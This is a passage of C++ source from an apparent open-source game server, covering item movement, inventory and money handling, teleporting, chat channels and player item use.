MAP_MAX_LAYERS) { break; } } if (fromCylinder) { const Position& fromPosition = fromCylinder->getPosition(); const Position& toPosition = toCylinder->getPosition(); if (fromPosition.z != toPosition.z && (fromPosition.x != toPosition.x || fromPosition.y != toPosition.y)) { Direction dir = getDirectionTo(fromPosition, toPosition); if ((dir & DIRECTION_DIAGONAL_MASK) == 0) { internalCreatureTurn(&creature, dir); } } } return RETURNVALUE_NOERROR; } void Game::playerMoveItemByPlayerID(uint32_t playerId, const Position& fromPos, uint16_t spriteId, uint8_t fromStackPos, const Position& toPos, uint8_t count) { Player* player = getPlayerByID(playerId); if (!player) { return; } playerMoveItem(player, fromPos, spriteId, fromStackPos, toPos, count, nullptr, nullptr); } void Game::playerMoveItem(Player* player, const Position& fromPos, uint16_t spriteId, uint8_t fromStackPos, const Position& toPos, uint8_t count, Item* item, Cylinder* toCylinder) { if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerMoveItemByPlayerID, this, player->getID(), fromPos, spriteId, fromStackPos, toPos, count)); player->setNextActionTask(task); return; } player->setNextActionTask(nullptr); if (item == nullptr) { uint8_t fromIndex = 0; if (fromPos.x == 0xFFFF) { if (fromPos.y & 0x40) { fromIndex = fromPos.z; } else { fromIndex = static_cast<uint8_t>(fromPos.y); } } else { fromIndex = fromStackPos; } Thing* thing = internalGetThing(player, fromPos, fromIndex, 0, STACKPOS_MOVE); if (!thing || !thing->getItem()) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } item = thing->getItem(); } if (item->getClientID() != spriteId) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Cylinder* fromCylinder = internalGetCylinder(player, fromPos); if (fromCylinder == nullptr) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (toCylinder == nullptr) { toCylinder = internalGetCylinder(player, toPos); if (toCylinder == nullptr) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } } if (!item->isPushable() || item->hasAttribute(ITEM_ATTRIBUTE_UNIQUEID)) { player->sendCancelMessage(RETURNVALUE_NOTMOVEABLE); return; } const Position& playerPos = player->getPosition(); const Position& mapFromPos = fromCylinder->getTile()->getPosition(); if 
(playerPos.z != mapFromPos.z) { player->sendCancelMessage(playerPos.z > mapFromPos.z ? RETURNVALUE_FIRSTGOUPSTAIRS : RETURNVALUE_FIRSTGODOWNSTAIRS); return; } if (!Position::areInRange<1, 1>(playerPos, mapFromPos)) { //need to walk to the item first before using it std::vector<Direction> listDir; if (player->getPathTo(item->getPosition(), listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerMoveItemByPlayerID, this, player->getID(), fromPos, spriteId, fromStackPos, toPos, count)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } const Tile* toCylinderTile = toCylinder->getTile(); const Position& mapToPos = toCylinderTile->getPosition(); //hangable item specific code if (item->isHangable() && toCylinderTile->hasFlag(TILESTATE_SUPPORTS_HANGABLE)) { //destination supports hangable objects so need to move there first bool vertical = toCylinderTile->hasProperty(CONST_PROP_ISVERTICAL); if (vertical) { if (playerPos.x + 1 == mapToPos.x) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } } else { // horizontal if (playerPos.y + 1 == mapToPos.y) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } } if (!Position::areInRange<1, 1, 0>(playerPos, mapToPos)) { Position walkPos = mapToPos; if (vertical) { walkPos.x++; } else { walkPos.y++; } Position itemPos = fromPos; uint8_t itemStackPos = fromStackPos; if (fromPos.x != 0xFFFF && Position::areInRange<1, 1>(mapFromPos, playerPos) && !Position::areInRange<1, 1, 0>(mapFromPos, walkPos)) { //need to pickup the item first Item* moveItem = nullptr; ReturnValue ret = internalMoveItem(fromCylinder, player, INDEX_WHEREEVER, item, count, &moveItem, 0, player, nullptr, &fromPos, &toPos); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); return; } //changing the position since its now in the inventory of the player internalGetPosition(moveItem, itemPos, itemStackPos); } std::vector<Direction> listDir; if (player->getPathTo(walkPos, listDir, 0, 0, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerMoveItemByPlayerID, this, player->getID(), itemPos, spriteId, itemStackPos, toPos, count)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } } if (!item->isPickupable() && playerPos.z != mapToPos.z) { player->sendCancelMessage(RETURNVALUE_DESTINATIONOUTOFREACH); return; } int32_t throwRange = item->getThrowRange(); if ((Position::getDistanceX(playerPos, mapToPos) > throwRange) || (Position::getDistanceY(playerPos, mapToPos) > throwRange)) { player->sendCancelMessage(RETURNVALUE_DESTINATIONOUTOFREACH); return; } if (!canThrowObjectTo(mapFromPos, mapToPos, true, false, throwRange, throwRange)) { player->sendCancelMessage(RETURNVALUE_CANNOTTHROW); return; } uint8_t toIndex = 0; if (toPos.x == 0xFFFF) { if (toPos.y & 0x40) { toIndex = toPos.z; } else { toIndex = static_cast<uint8_t>(toPos.y); } } ReturnValue ret = internalMoveItem(fromCylinder, toCylinder, toIndex, item, count, nullptr, 0, player, nullptr, &fromPos, &toPos); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); } } ReturnValue Game::internalMoveItem(Cylinder* fromCylinder, Cylinder* toCylinder, int32_t index, Item* item, uint32_t count, 
Item** _moveItem, uint32_t flags /*= 0*/, Creature* actor/* = nullptr*/, Item* tradeItem/* = nullptr*/, const Position* fromPos /*= nullptr*/, const Position* toPos/*= nullptr*/) { Player* actorPlayer = actor ? actor->getPlayer() : nullptr; if (actorPlayer && fromPos && toPos) { if (!g_events->eventPlayerOnMoveItem(actorPlayer, item, count, *fromPos, *toPos, fromCylinder, toCylinder)) { return RETURNVALUE_NOTPOSSIBLE; } } Tile* fromTile = fromCylinder->getTile(); if (fromTile) { auto it = browseFields.find(fromTile); if (it != browseFields.end() && it->second == fromCylinder) { fromCylinder = fromTile; } } Item* toItem = nullptr; Cylinder* subCylinder; int floorN = 0; while ((subCylinder = toCylinder->queryDestination(index, *item, &toItem, flags)) != toCylinder) { toCylinder = subCylinder; flags = 0; //to prevent infinite loop if (++floorN >= MAP_MAX_LAYERS) { break; } } //destination is the same as the source? if (item == toItem) { return RETURNVALUE_NOERROR; //silently ignore move } //check if we can add this item ReturnValue ret = toCylinder->queryAdd(index, *item, count, flags, actor); if (ret == RETURNVALUE_NEEDEXCHANGE) { //check if we can add it to source cylinder ret = fromCylinder->queryAdd(fromCylinder->getThingIndex(item), *toItem, toItem->getItemCount(), 0); if (ret == RETURNVALUE_NOERROR) { if (actorPlayer && fromPos && toPos && !g_events->eventPlayerOnMoveItem(actorPlayer, toItem, count, *toPos, *fromPos, toCylinder, fromCylinder)) { return RETURNVALUE_NOTPOSSIBLE; } //check how much we can move uint32_t maxExchangeQueryCount = 0; ReturnValue retExchangeMaxCount = fromCylinder->queryMaxCount(INDEX_WHEREEVER, *toItem, toItem->getItemCount(), maxExchangeQueryCount, 0); if (retExchangeMaxCount != RETURNVALUE_NOERROR && maxExchangeQueryCount == 0) { return retExchangeMaxCount; } if (toCylinder->queryRemove(*toItem, toItem->getItemCount(), flags, actor) == RETURNVALUE_NOERROR) { int32_t oldToItemIndex = toCylinder->getThingIndex(toItem); toCylinder->removeThing(toItem, toItem->getItemCount()); fromCylinder->addThing(toItem); if (oldToItemIndex != -1) { toCylinder->postRemoveNotification(toItem, fromCylinder, oldToItemIndex); } int32_t newToItemIndex = fromCylinder->getThingIndex(toItem); if (newToItemIndex != -1) { fromCylinder->postAddNotification(toItem, toCylinder, newToItemIndex); } ret = toCylinder->queryAdd(index, *item, count, flags); toItem = nullptr; } } } if (ret != RETURNVALUE_NOERROR) { return ret; } //check how much we can move uint32_t maxQueryCount = 0; ReturnValue retMaxCount = toCylinder->queryMaxCount(index, *item, count, maxQueryCount, flags); if (retMaxCount != RETURNVALUE_NOERROR && maxQueryCount == 0) { return retMaxCount; } uint32_t m; if (item->isStackable()) { m = std::min<uint32_t>(count, maxQueryCount); } else { m = maxQueryCount; } Item* moveItem = item; //check if we can remove this item ret = fromCylinder->queryRemove(*item, m, flags, actor); if (ret != RETURNVALUE_NOERROR) { return ret; } if (tradeItem) { if (toCylinder->getItem() == tradeItem) { return RETURNVALUE_NOTENOUGHROOM; } Cylinder* tmpCylinder = toCylinder->getParent(); while (tmpCylinder) { if (tmpCylinder->getItem() == tradeItem) { return RETURNVALUE_NOTENOUGHROOM; } tmpCylinder = tmpCylinder->getParent(); } } //remove the item int32_t itemIndex = fromCylinder->getThingIndex(item); Item* updateItem = nullptr; fromCylinder->removeThing(item, m); //update item(s) if (item->isStackable()) { uint32_t n; if (item->equals(toItem)) { n = std::min<uint32_t>(100 - toItem->getItemCount(), m); 
toCylinder->updateThing(toItem, toItem->getID(), toItem->getItemCount() + n); updateItem = toItem; } else { n = 0; } int32_t newCount = m - n; if (newCount > 0) { moveItem = item->clone(); moveItem->setItemCount(newCount); } else { moveItem = nullptr; } if (item->isRemoved()) { ReleaseItem(item); } } //add item if (moveItem /*m - n > 0*/) { toCylinder->addThing(index, moveItem); } if (itemIndex != -1) { fromCylinder->postRemoveNotification(item, toCylinder, itemIndex); } if (moveItem) { int32_t moveItemIndex = toCylinder->getThingIndex(moveItem); if (moveItemIndex != -1) { toCylinder->postAddNotification(moveItem, fromCylinder, moveItemIndex); } } if (updateItem) { int32_t updateItemIndex = toCylinder->getThingIndex(updateItem); if (updateItemIndex != -1) { toCylinder->postAddNotification(updateItem, fromCylinder, updateItemIndex); } } if (_moveItem) { if (moveItem) { *_moveItem = moveItem; } else { *_moveItem = item; } } //we could not move all, inform the player if (item->isStackable() && maxQueryCount < count) { return retMaxCount; } if (moveItem && moveItem->getDuration() > 0) { if (moveItem->getDecaying() != DECAYING_TRUE) { moveItem->incrementReferenceCounter(); moveItem->setDecaying(DECAYING_TRUE); toDecayItems.push_front(moveItem); } } if (actorPlayer && fromPos && toPos) { g_events->eventPlayerOnItemMoved(actorPlayer, item, count, *fromPos, *toPos, fromCylinder, toCylinder); } return ret; } ReturnValue Game::internalAddItem(Cylinder* toCylinder, Item* item, int32_t index /*= INDEX_WHEREEVER*/, uint32_t flags/* = 0*/, bool test/* = false*/) { uint32_t remainderCount = 0; return internalAddItem(toCylinder, item, index, flags, test, remainderCount); } ReturnValue Game::internalAddItem(Cylinder* toCylinder, Item* item, int32_t index, uint32_t flags, bool test, uint32_t& remainderCount) { if (toCylinder == nullptr || item == nullptr) { return RETURNVALUE_NOTPOSSIBLE; } Cylinder* destCylinder = toCylinder; Item* toItem = nullptr; toCylinder = toCylinder->queryDestination(index, *item, &toItem, flags); //check if we can add this item ReturnValue ret = toCylinder->queryAdd(index, *item, item->getItemCount(), flags); if (ret != RETURNVALUE_NOERROR) { return ret; } /* Check if we can move add the whole amount, we do this by checking against the original cylinder, since the queryDestination can return a cylinder that might only hold a part of the full amount. 
*/ uint32_t maxQueryCount = 0; ret = destCylinder->queryMaxCount(INDEX_WHEREEVER, *item, item->getItemCount(), maxQueryCount, flags); if (ret != RETURNVALUE_NOERROR) { return ret; } if (test) { return RETURNVALUE_NOERROR; } if (item->isStackable() && item->equals(toItem)) { uint32_t m = std::min<uint32_t>(item->getItemCount(), maxQueryCount); uint32_t n = std::min<uint32_t>(100 - toItem->getItemCount(), m); toCylinder->updateThing(toItem, toItem->getID(), toItem->getItemCount() + n); int32_t count = m - n; if (count > 0) { if (item->getItemCount() != count) { Item* remainderItem = item->clone(); remainderItem->setItemCount(count); if (internalAddItem(destCylinder, remainderItem, INDEX_WHEREEVER, flags, false) != RETURNVALUE_NOERROR) { ReleaseItem(remainderItem); remainderCount = count; } } else { toCylinder->addThing(index, item); int32_t itemIndex = toCylinder->getThingIndex(item); if (itemIndex != -1) { toCylinder->postAddNotification(item, nullptr, itemIndex); } } } else { //fully merged with toItem, item will be destroyed item->onRemoved(); ReleaseItem(item); int32_t itemIndex = toCylinder->getThingIndex(toItem); if (itemIndex != -1) { toCylinder->postAddNotification(toItem, nullptr, itemIndex); } } } else { toCylinder->addThing(index, item); int32_t itemIndex = toCylinder->getThingIndex(item); if (itemIndex != -1) { toCylinder->postAddNotification(item, nullptr, itemIndex); } } if (item->getDuration() > 0) { item->incrementReferenceCounter(); item->setDecaying(DECAYING_TRUE); toDecayItems.push_front(item); } return RETURNVALUE_NOERROR; } ReturnValue Game::internalRemoveItem(Item* item, int32_t count /*= -1*/, bool test /*= false*/, uint32_t flags /*= 0*/) { Cylinder* cylinder = item->getParent(); if (cylinder == nullptr) { return RETURNVALUE_NOTPOSSIBLE; } Tile* fromTile = cylinder->getTile(); if (fromTile) { auto it = browseFields.find(fromTile); if (it != browseFields.end() && it->second == cylinder) { cylinder = fromTile; } } if (count == -1) { count = item->getItemCount(); } //check if we can remove this item ReturnValue ret = cylinder->queryRemove(*item, count, flags | FLAG_IGNORENOTMOVEABLE); if (ret != RETURNVALUE_NOERROR) { return ret; } if (!item->canRemove()) { return RETURNVALUE_NOTPOSSIBLE; } if (!test) { int32_t index = cylinder->getThingIndex(item); //remove the item cylinder->removeThing(item, count); if (item->isRemoved()) { item->onRemoved(); if (item->canDecay()) { decayItems->remove(item); } ReleaseItem(item); } cylinder->postRemoveNotification(item, nullptr, index); } return RETURNVALUE_NOERROR; } ReturnValue Game::internalPlayerAddItem(Player* player, Item* item, bool dropOnMap /*= true*/, slots_t slot /*= CONST_SLOT_WHEREEVER*/) { uint32_t remainderCount = 0; ReturnValue ret = internalAddItem(player, item, static_cast<int32_t>(slot), 0, false, remainderCount); if (remainderCount != 0) { Item* remainderItem = Item::CreateItem(item->getID(), remainderCount); ReturnValue remaindRet = internalAddItem(player->getTile(), remainderItem, INDEX_WHEREEVER, FLAG_NOLIMIT); if (remaindRet != RETURNVALUE_NOERROR) { ReleaseItem(remainderItem); } } if (ret != RETURNVALUE_NOERROR && dropOnMap) { ret = internalAddItem(player->getTile(), item, INDEX_WHEREEVER, FLAG_NOLIMIT); } return ret; } Item* Game::findItemOfType(Cylinder* cylinder, uint16_t itemId, bool depthSearch /*= true*/, int32_t subType /*= -1*/) const { if (cylinder == nullptr) { return nullptr; } std::vector<Container*> containers; for (size_t i = cylinder->getFirstIndex(), j = cylinder->getLastIndex(); i < j; ++i) { 
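//first pass: inspect the cylinder's direct children; containers found here are
//queued and searched breadth-first further below (when depthSearch is enabled)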
Thing* thing = cylinder->getThing(i); if (!thing) { continue; } Item* item = thing->getItem(); if (!item) { continue; } if (item->getID() == itemId && (subType == -1 || subType == item->getSubType())) { return item; } if (depthSearch) { Container* container = item->getContainer(); if (container) { containers.push_back(container); } } } size_t i = 0; while (i < containers.size()) { Container* container = containers[i++]; for (Item* item : container->getItemList()) { if (item->getID() == itemId && (subType == -1 || subType == item->getSubType())) { return item; } Container* subContainer = item->getContainer(); if (subContainer) { containers.push_back(subContainer); } } } return nullptr; } bool Game::removeMoney(Cylinder* cylinder, uint64_t money, uint32_t flags /*= 0*/) { if (cylinder == nullptr) { return false; } if (money == 0) { return true; } std::vector<Container*> containers; std::multimap<uint32_t, Item*> moneyMap; uint64_t moneyCount = 0; for (size_t i = cylinder->getFirstIndex(), j = cylinder->getLastIndex(); i < j; ++i) { Thing* thing = cylinder->getThing(i); if (!thing) { continue; } Item* item = thing->getItem(); if (!item) { continue; } Container* container = item->getContainer(); if (container) { containers.push_back(container); } else { const uint32_t worth = item->getWorth(); if (worth != 0) { moneyCount += worth; moneyMap.emplace(worth, item); } } } size_t i = 0; while (i < containers.size()) { Container* container = containers[i++]; for (Item* item : container->getItemList()) { Container* tmpContainer = item->getContainer(); if (tmpContainer) { containers.push_back(tmpContainer); } else { const uint32_t worth = item->getWorth(); if (worth != 0) { moneyCount += worth; moneyMap.emplace(worth, item); } } } } if (moneyCount < money) { return false; } for (const auto& moneyEntry : moneyMap) { Item* item = moneyEntry.second; if (moneyEntry.first < money) { internalRemoveItem(item); money -= moneyEntry.first; } else if (moneyEntry.first > money) { const uint32_t worth = moneyEntry.first / item->getItemCount(); const uint32_t removeCount = std::ceil(money / static_cast<double>(worth)); addMoney(cylinder, (worth * removeCount) - money, flags); internalRemoveItem(item, removeCount); break; } else { internalRemoveItem(item); break; } } return true; } void Game::addMoney(Cylinder* cylinder, uint64_t money, uint32_t flags /*= 0*/) { if (money == 0) { return; } uint32_t crystalCoins = money / 10000; money -= crystalCoins * 10000; while (crystalCoins > 0) { const uint16_t count = std::min<uint32_t>(100, crystalCoins); Item* remaindItem = Item::CreateItem(ITEM_CRYSTAL_COIN, count); ReturnValue ret = internalAddItem(cylinder, remaindItem, INDEX_WHEREEVER, flags); if (ret != RETURNVALUE_NOERROR) { internalAddItem(cylinder->getTile(), remaindItem, INDEX_WHEREEVER, FLAG_NOLIMIT); } crystalCoins -= count; } uint16_t platinumCoins = money / 100; if (platinumCoins != 0) { Item* remaindItem = Item::CreateItem(ITEM_PLATINUM_COIN, platinumCoins); ReturnValue ret = internalAddItem(cylinder, remaindItem, INDEX_WHEREEVER, flags); if (ret != RETURNVALUE_NOERROR) { internalAddItem(cylinder->getTile(), remaindItem, INDEX_WHEREEVER, FLAG_NOLIMIT); } money -= platinumCoins * 100; } if (money != 0) { Item* remaindItem = Item::CreateItem(ITEM_GOLD_COIN, money); ReturnValue ret = internalAddItem(cylinder, remaindItem, INDEX_WHEREEVER, flags); if (ret != RETURNVALUE_NOERROR) { internalAddItem(cylinder->getTile(), remaindItem, INDEX_WHEREEVER, FLAG_NOLIMIT); } } } Item* Game::transformItem(Item* item, uint16_t 
newId, int32_t newCount /*= -1*/) { if (item->getID() == newId && (newCount == -1 || (newCount == item->getSubType() && newCount != 0))) { //chargeless item placed on map = infinite return item; } Cylinder* cylinder = item->getParent(); if (cylinder == nullptr) { return nullptr; } Tile* fromTile = cylinder->getTile(); if (fromTile) { auto it = browseFields.find(fromTile); if (it != browseFields.end() && it->second == cylinder) { cylinder = fromTile; } } int32_t itemIndex = cylinder->getThingIndex(item); if (itemIndex == -1) { return item; } if (!item->canTransform()) { return item; } const ItemType& newType = Item::items[newId]; if (newType.id == 0) { return item; } const ItemType& curType = Item::items[item->getID()]; if (curType.alwaysOnTop != newType.alwaysOnTop) { //This only occurs when you transform items on tiles from a downItem to a topItem (or vice versa) //Remove the old, and add the new cylinder->removeThing(item, item->getItemCount()); cylinder->postRemoveNotification(item, cylinder, itemIndex); item->setID(newId); if (newCount != -1) { item->setSubType(newCount); } cylinder->addThing(item); Cylinder* newParent = item->getParent(); if (newParent == nullptr) { ReleaseItem(item); return nullptr; } newParent->postAddNotification(item, cylinder, newParent->getThingIndex(item)); return item; } if (curType.type == newType.type) { //Both items has the same type so we can safely change id/subtype if (newCount == 0 && (item->isStackable() || item->hasAttribute(ITEM_ATTRIBUTE_CHARGES))) { if (item->isStackable()) { internalRemoveItem(item); return nullptr; } else { int32_t newItemId = newId; if (curType.id == newType.id) { newItemId = item->getDecayTo(); } if (newItemId < 0) { internalRemoveItem(item); return nullptr; } else if (newItemId != newId) { //Replacing the the old item with the new while maintaining the old position Item* newItem = Item::CreateItem(newItemId, 1); if (newItem == nullptr) { return nullptr; } cylinder->replaceThing(itemIndex, newItem); cylinder->postAddNotification(newItem, cylinder, itemIndex); item->setParent(nullptr); cylinder->postRemoveNotification(item, cylinder, itemIndex); ReleaseItem(item); return newItem; } return transformItem(item, newItemId); } } else { cylinder->postRemoveNotification(item, cylinder, itemIndex); uint16_t itemId = item->getID(); int32_t count = item->getSubType(); if (curType.id != newType.id) { if (newType.group != curType.group) { item->setDefaultSubtype(); } itemId = newId; } if (newCount != -1 && newType.hasSubType()) { count = newCount; } cylinder->updateThing(item, itemId, count); cylinder->postAddNotification(item, cylinder, itemIndex); return item; } } //Replacing the old item with the new while maintaining the old position Item* newItem; if (newCount == -1) { newItem = Item::CreateItem(newId); } else { newItem = Item::CreateItem(newId, newCount); } if (newItem == nullptr) { return nullptr; } cylinder->replaceThing(itemIndex, newItem); cylinder->postAddNotification(newItem, cylinder, itemIndex); item->setParent(nullptr); cylinder->postRemoveNotification(item, cylinder, itemIndex); ReleaseItem(item); if (newItem->getDuration() > 0) { if (newItem->getDecaying() != DECAYING_TRUE) { newItem->incrementReferenceCounter(); newItem->setDecaying(DECAYING_TRUE); toDecayItems.push_front(newItem); } } return newItem; } ReturnValue Game::internalTeleport(Thing* thing, const Position& newPos, bool pushMove/* = true*/, uint32_t flags /*= 0*/) { if (newPos == thing->getPosition()) { return RETURNVALUE_NOERROR; } else if (thing->isRemoved()) { 
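//a thing that has already been removed cannot be teleported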
return RETURNVALUE_NOTPOSSIBLE; } Tile* toTile = map.getTile(newPos); if (!toTile) { return RETURNVALUE_NOTPOSSIBLE; } if (Creature* creature = thing->getCreature()) { ReturnValue ret = toTile->queryAdd(0, *creature, 1, FLAG_NOLIMIT); if (ret != RETURNVALUE_NOERROR) { return ret; } map.moveCreature(*creature, *toTile, !pushMove); return RETURNVALUE_NOERROR; } else if (Item* item = thing->getItem()) { return internalMoveItem(item->getParent(), toTile, INDEX_WHEREEVER, item, item->getItemCount(), nullptr, flags); } return RETURNVALUE_NOTPOSSIBLE; } Item* searchForItem(Container* container, uint16_t itemId) { for (ContainerIterator it = container->iterator(); it.hasNext(); it.advance()) { if ((*it)->getID() == itemId) { return *it; } } return nullptr; } slots_t getSlotType(const ItemType& it) { slots_t slot = CONST_SLOT_RIGHT; if (it.weaponType != WeaponType_t::WEAPON_SHIELD) { int32_t slotPosition = it.slotPosition; if (slotPosition & SLOTP_HEAD) { slot = CONST_SLOT_HEAD; } else if (slotPosition & SLOTP_NECKLACE) { slot = CONST_SLOT_NECKLACE; } else if (slotPosition & SLOTP_ARMOR) { slot = CONST_SLOT_ARMOR; } else if (slotPosition & SLOTP_LEGS) { slot = CONST_SLOT_LEGS; } else if (slotPosition & SLOTP_FEET) { slot = CONST_SLOT_FEET; } else if (slotPosition & SLOTP_RING) { slot = CONST_SLOT_RING; } else if (slotPosition & SLOTP_AMMO) { slot = CONST_SLOT_AMMO; } else if (slotPosition & SLOTP_TWO_HAND || slotPosition & SLOTP_LEFT) { slot = CONST_SLOT_LEFT; } } return slot; } //Implementation of player invoked events void Game::playerEquipItem(uint32_t playerId, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Item* item = player->getInventoryItem(CONST_SLOT_BACKPACK); if (!item) { return; } Container* backpack = item->getContainer(); if (!backpack) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); slots_t slot = getSlotType(it); Item* slotItem = player->getInventoryItem(slot); Item* equipItem = searchForItem(backpack, it.id); if (slotItem && slotItem->getID() == it.id && (!it.stackable || slotItem->getItemCount() == 100 || !equipItem)) { internalMoveItem(slotItem->getParent(), player, CONST_SLOT_WHEREEVER, slotItem, slotItem->getItemCount(), nullptr); } else if (equipItem) { internalMoveItem(equipItem->getParent(), player, slot, equipItem, equipItem->getItemCount(), nullptr); } } void Game::playerMove(uint32_t playerId, Direction direction) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (player->isMovementBlocked()) { player->sendCancelWalk(); return; } player->resetIdleTime(); player->setNextWalkActionTask(nullptr); player->startAutoWalk(direction); } bool Game::playerBroadcastMessage(Player* player, const std::string& text) const { if (!player->hasFlag(PlayerFlag_CanBroadcast)) { return false; } std::cout << "> " << player->getName() << " broadcasted: \"" << text << "\"." 
<< std::endl; for (const auto& it : players) { it.second->sendPrivateMessage(player, TALKTYPE_BROADCAST, text); } return true; } void Game::playerCreatePrivateChannel(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player || !player->isPremium()) { return; } ChatChannel* channel = g_chat->createChannel(*player, CHANNEL_PRIVATE); if (!channel || !channel->addUser(*player)) { return; } player->sendCreatePrivateChannel(channel->getId(), channel->getName()); } void Game::playerChannelInvite(uint32_t playerId, const std::string& name) { Player* player = getPlayerByID(playerId); if (!player) { return; } PrivateChatChannel* channel = g_chat->getPrivateChannel(*player); if (!channel) { return; } Player* invitePlayer = getPlayerByName(name); if (!invitePlayer) { return; } if (player == invitePlayer) { return; } channel->invitePlayer(*player, *invitePlayer); } void Game::playerChannelExclude(uint32_t playerId, const std::string& name) { Player* player = getPlayerByID(playerId); if (!player) { return; } PrivateChatChannel* channel = g_chat->getPrivateChannel(*player); if (!channel) { return; } Player* excludePlayer = getPlayerByName(name); if (!excludePlayer) { return; } if (player == excludePlayer) { return; } channel->excludePlayer(*player, *excludePlayer); } void Game::playerRequestChannels(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->sendChannelsDialog(); } void Game::playerOpenChannel(uint32_t playerId, uint16_t channelId) { Player* player = getPlayerByID(playerId); if (!player) { return; } ChatChannel* channel = g_chat->addUserToChannel(*player, channelId); if (!channel) { return; } const InvitedMap* invitedUsers = channel->getInvitedUsers(); const UsersMap* users; if (!channel->isPublicChannel()) { users = &channel->getUsers(); } else { users = nullptr; } player->sendChannel(channel->getId(), channel->getName(), users, invitedUsers); } void Game::playerCloseChannel(uint32_t playerId, uint16_t channelId) { Player* player = getPlayerByID(playerId); if (!player) { return; } g_chat->removeUserFromChannel(*player, channelId); } void Game::playerOpenPrivateChannel(uint32_t playerId, std::string& receiver) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!IOLoginData::formatPlayerName(receiver)) { player->sendCancelMessage("A player with this name does not exist."); return; } if (player->getName() == receiver) { player->sendCancelMessage("You cannot set up a private message channel with yourself."); return; } player->sendOpenPrivateChannel(receiver); } void Game::playerCloseNpcChannel(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } SpectatorVec spectators; map.getSpectators(spectators, player->getPosition()); for (Creature* spectator : spectators) { if (Npc* npc = spectator->getNpc()) { npc->onPlayerCloseChannel(player); } } } void Game::playerReceivePing(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->receivePing(); } void Game::playerReceivePingBack(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->sendPingBack(); } void Game::playerAutoWalk(uint32_t playerId, const std::vector<Direction>& listDir) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->resetIdleTime(); player->setNextWalkTask(nullptr); player->startAutoWalk(listDir); } void Game::playerStopAutoWalk(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } 
player->stopWalk(); } void Game::playerUseItemEx(uint32_t playerId, const Position& fromPos, uint8_t fromStackPos, uint16_t fromSpriteId, const Position& toPos, uint8_t toStackPos, uint16_t toSpriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } bool isHotkey = (fromPos.x == 0xFFFF && fromPos.y == 0 && fromPos.z == 0); if (isHotkey && !g_config.getBoolean(ConfigManager::AIMBOT_HOTKEY_ENABLED)) { return; } Thing* thing = internalGetThing(player, fromPos, fromStackPos, fromSpriteId, STACKPOS_USEITEM); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Item* item = thing->getItem(); if (!item || !item->isUseable() || item->getClientID() != fromSpriteId) { player->sendCancelMessage(RETURNVALUE_CANNOTUSETHISOBJECT); return; } Position walkToPos = fromPos; ReturnValue ret = g_actions->canUse(player, fromPos); if (ret == RETURNVALUE_NOERROR) { ret = g_actions->canUse(player, toPos, item); if (ret == RETURNVALUE_TOOFARAWAY) { walkToPos = toPos; } } if (ret != RETURNVALUE_NOERROR) { if (ret == RETURNVALUE_TOOFARAWAY) { Position itemPos = fromPos; uint8_t itemStackPos = fromStackPos; if (fromPos.x != 0xFFFF && toPos.x != 0xFFFF && Position::areInRange<1, 1, 0>(fromPos, player->getPosition()) && !Position::areInRange<1, 1, 0>(fromPos, toPos)) { Item* moveItem = nullptr; ret = internalMoveItem(item->getParent(), player, INDEX_WHEREEVER, item, item->getItemCount(), &moveItem, 0, player, nullptr, &fromPos, &toPos); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); return; } //changing the position since its now in the inventory of the player internalGetPosition(moveItem, itemPos, itemStackPos); } std::vector<Direction> listDir; if (player->getPathTo(walkToPos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerUseItemEx, this, playerId, itemPos, itemStackPos, fromSpriteId, toPos, toStackPos, toSpriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } player->sendCancelMessage(ret); return; } if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerUseItemEx, this, playerId, fromPos, fromStackPos, fromSpriteId, toPos, toStackPos, toSpriteId)); player->setNextActionTask(task); return; } player->resetIdleTime(); player->setNextActionTask(nullptr); g_actions->useItemEx(player, fromPos, toPos, toStackPos, item, isHotkey); } void Game::playerUseItem(uint32_t playerId, const Position& pos, uint8_t stackPos, uint8_t index, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } bool isHotkey = (pos.x == 0xFFFF && pos.y == 0 && pos.z == 0); if (isHotkey && !g_config.getBoolean(ConfigManager::AIMBOT_HOTKEY_ENABLED)) { return; } Thing* thing = internalGetThing(player, pos, stackPos, spriteId, STACKPOS_USEITEM); if (!thing) { 